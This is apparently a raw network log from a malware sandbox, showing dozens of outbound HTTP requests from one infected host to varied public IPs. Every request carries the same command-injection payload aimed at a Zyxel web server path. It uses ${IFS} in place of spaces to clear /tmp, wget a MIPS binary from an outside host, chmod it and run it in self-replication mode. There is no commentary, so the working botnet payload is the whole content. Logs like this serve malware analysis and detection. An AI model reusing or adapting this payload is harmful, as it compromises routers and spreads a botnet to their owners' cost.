                                                Jan 29, 2024 07:07:36.074873924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1436192.168.2.2332800216.121.112.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074907064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1437192.168.2.2335272216.204.244.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074944973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1438192.168.2.2335948104.216.35.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.075007915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1439192.168.2.2358144174.212.51.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.075041056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1440192.168.2.235278648.67.231.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.075076103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1441192.168.2.234266867.8.93.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.075107098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1442192.168.2.2345338139.178.8.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.075150967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1443192.168.2.236055069.149.211.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.075216055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1444192.168.2.2336580126.181.21.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.075237036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1445192.168.2.234514844.44.125.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.075273037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1446192.168.2.235631247.108.48.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.075334072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1447192.168.2.2335742119.251.191.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.075366020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1448192.168.2.236046436.254.146.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.078362942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1449192.168.2.234615637.67.143.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.074975967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1450192.168.2.235753065.7.1.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075011969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1451192.168.2.235908480.99.192.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075150013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1452192.168.2.2335840119.194.58.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075193882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1453192.168.2.2338956208.168.9.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075225115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1454192.168.2.234583427.170.33.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075256109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1455192.168.2.235196436.47.164.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075288057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1456192.168.2.235978096.110.165.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075316906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1457192.168.2.235358882.78.26.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075411081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1458192.168.2.233421061.139.155.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075464964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1459192.168.2.2344324221.185.147.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075484037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1460192.168.2.235547637.77.122.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075552940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1461192.168.2.2332864170.20.175.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075582981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1462192.168.2.2357356217.4.140.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075607061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1463192.168.2.234745834.15.232.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075645924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1464192.168.2.233587640.247.174.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075666904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1465192.168.2.2338176210.47.126.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075743914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1466192.168.2.2355720136.237.77.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075783968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1467192.168.2.2337392128.227.240.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075825930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1468192.168.2.234612484.163.217.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075855017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1469192.168.2.2335666126.195.158.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075895071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1470192.168.2.235483087.235.204.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075937986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1471192.168.2.2345794207.51.11.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.075992107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1472192.168.2.234482064.30.106.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076020956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1473192.168.2.236010871.252.141.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076070070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1474192.168.2.235716288.179.28.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076088905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1475192.168.2.2348556174.160.44.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076152086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1476192.168.2.2342142161.250.170.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076180935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1477192.168.2.2338592132.152.142.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076219082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1478192.168.2.233950688.150.94.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076246023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1479192.168.2.2338880207.245.255.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076277971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1480192.168.2.2348872112.13.252.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076308012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1481192.168.2.2338218145.203.58.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076351881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1482192.168.2.233561885.163.47.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076395988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1483192.168.2.236014678.14.116.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076426029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1484192.168.2.234532417.115.119.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076464891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1485192.168.2.233464866.15.201.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076550007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1486192.168.2.2355358130.153.90.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076575994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1487192.168.2.2342192136.205.186.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076586008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1488192.168.2.234253040.66.188.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076653004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1489192.168.2.2358036221.189.147.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076689959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1490192.168.2.2356420207.217.143.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076719999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1491192.168.2.234538648.116.150.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076756954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1492192.168.2.2333650192.126.105.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076788902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1493192.168.2.2360898206.59.32.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076847076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1494192.168.2.2348130189.13.93.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076898098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1495192.168.2.234051044.67.214.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076940060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1496192.168.2.235903432.214.189.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.076951027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1497192.168.2.2340534123.198.91.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077012062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1498192.168.2.2338716139.32.29.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077042103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1499192.168.2.235271097.166.229.223443
                                                TimestampBytes transferredDirectionData
